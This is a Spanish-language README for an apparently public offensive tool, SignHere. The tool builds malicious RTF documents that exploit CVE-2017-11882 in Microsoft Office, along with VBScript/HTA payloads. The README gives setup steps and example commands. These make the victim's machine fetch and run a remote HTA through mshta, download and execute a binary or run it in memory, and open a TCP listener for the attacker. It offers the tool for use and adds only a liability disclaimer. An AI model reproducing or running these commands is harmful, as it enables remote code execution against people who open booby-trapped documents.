
SignHere es una implementación de CVE-2017-11882. SignHere es un constructor de documentos rtf maliciosos y payloads de VBScript.
CVE-2017-11882 - El identificador único de vulnerabilidad de Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1 y Microsoft Office 2016 permite a un atacante ejecutar código en el contexto del usuario actual sin manejar correctamente los objetos en memoria, la llamada "vulnerabilidad de corrupción de memoria de Microsoft Office". La implementación incluye la creación de un programa para construir documentos rtf maliciosos y payloads en VBScript
Son los documentos rtf los que son vulnerables porque pueden ser «programados» conociendo comandos especiales: cabeceras RTF. De esta forma, se crea un objeto binario (ejecutable) en el cuerpo del documento; de hecho, se trata de una fórmula de Microsoft Equation con el código que contiene el comando cmd. Luego puedes generar el payload en VBScript y usar el comando " mshta enlace al archivo payload" para ejecutar el archivo hta.
El autor y los colaboradores no son responsables de cualquier daño causado a ti o por ti.
Puedes usar Termux, pero la ejecución del programa requiere root
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
Primero, necesitas descargar el archivo. Luego descomprímelo y abre una ventana de PowerShell en esta carpeta y escribe:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd Argumento con el comando de Windows que se ejecutará después de abrir el documento.
--powershell Argumento con el comando de PowerShell que estará en el payload de VBScript.
--ip Argumento con la dirección IP que se usará para el servidor web. (por defecto: 127.0.0.1)
--output Nombre y ruta del documento.
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp Argumento que utilizará el archivo binario como payload (el archivo binario se iniciará en la memoria RAM).
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload Argumento que descargará el archivo en el equipo de la víctima y lo ejecutará.
--listener-host Argumento para iniciar un listener TCP en la IP actual (por defecto: 127.0.0.1)